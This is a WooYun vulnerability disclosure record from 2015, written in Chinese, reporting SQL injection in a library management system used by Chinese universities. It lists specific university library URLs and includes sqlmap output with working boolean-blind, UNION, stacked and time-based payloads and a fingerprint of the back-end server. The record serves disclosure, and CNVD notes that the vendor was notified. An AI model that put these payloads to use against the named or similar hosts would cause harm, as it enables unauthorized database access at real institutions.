乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-15: 细节已通知厂商并且等待厂商处理中 2015-01-20: 厂商已经确认,细节仅向厂商公开 2015-01-23: 细节向第三方安全合作伙伴开放 2015-03-16: 细节向核心白帽子及相关领域专家公开 2015-03-26: 细节向普通白帽子公开 2015-04-05: 细节向实习白帽子公开 2015-04-15: 细节向公众公开
RT
有大牛交过了更多案例见: WooYun: 某图书馆管理系统存在SQL注入
http://211.64.123.12/bj_client/App_Pages/App_page/News_Detail.aspx?ID=7http://59.73.148.27:8080/bj_client/App_Pages/App_page/News_Detail.aspx?ID=7http://lib.xjmu.edu.cn/oa_client/App_Pages/App_page/News_Detail.aspx?ID=10http://vrs.lib.xju.edu.cn/oa_client/App_Pages/App_page/News_Detail.aspx?ID=8http://lib.heuet.edu.cn:8080/oa_client/App_Pages/App_page/News_Detail.aspx?ID=8
Place: GETParameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=7' AND 5261=5261 AND 'HVEC'='HVEC Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: ID=7' UNION ALL SELECT NULL, NULL, NULL, CHAR(58)+CHAR(115)+CHAR(120)+CHAR(99)+CHAR(58)+CHAR(76)+CHAR(105)+CHAR(85)+CHAR(78)+CHAR(79)+CHAR(109)+CHAR(102)+CHAR(101)+CHAR(116)+CHAR(117)+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(110)+CHAR(58), NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ID=7'; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ID=7' WAITFOR DELAY '0:0:5'-----[11:52:40] [INFO] testing MySQL[11:52:41] [WARNING] the back-end DBMS is not MySQL[11:52:41] [INFO] testing Oracle[11:52:41] [WARNING] the back-end DBMS is not Oracle[11:52:41] [INFO] testing PostgreSQL[11:52:41] [WARNING] the back-end DBMS is not PostgreSQL[11:52:41] [INFO] testing Microsoft SQL Server[11:52:42] [INFO] confirming Microsoft SQL Server[11:52:46] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005[11:52:46] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HZ$D86~1.085\HZ$D86~1.088\SQLMAP~1\Bin\output\59.73.148.27'
过滤
危害等级:高
漏洞Rank:14
确认时间:2015-01-20 14:35
CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向赛尔教育通报。
暂无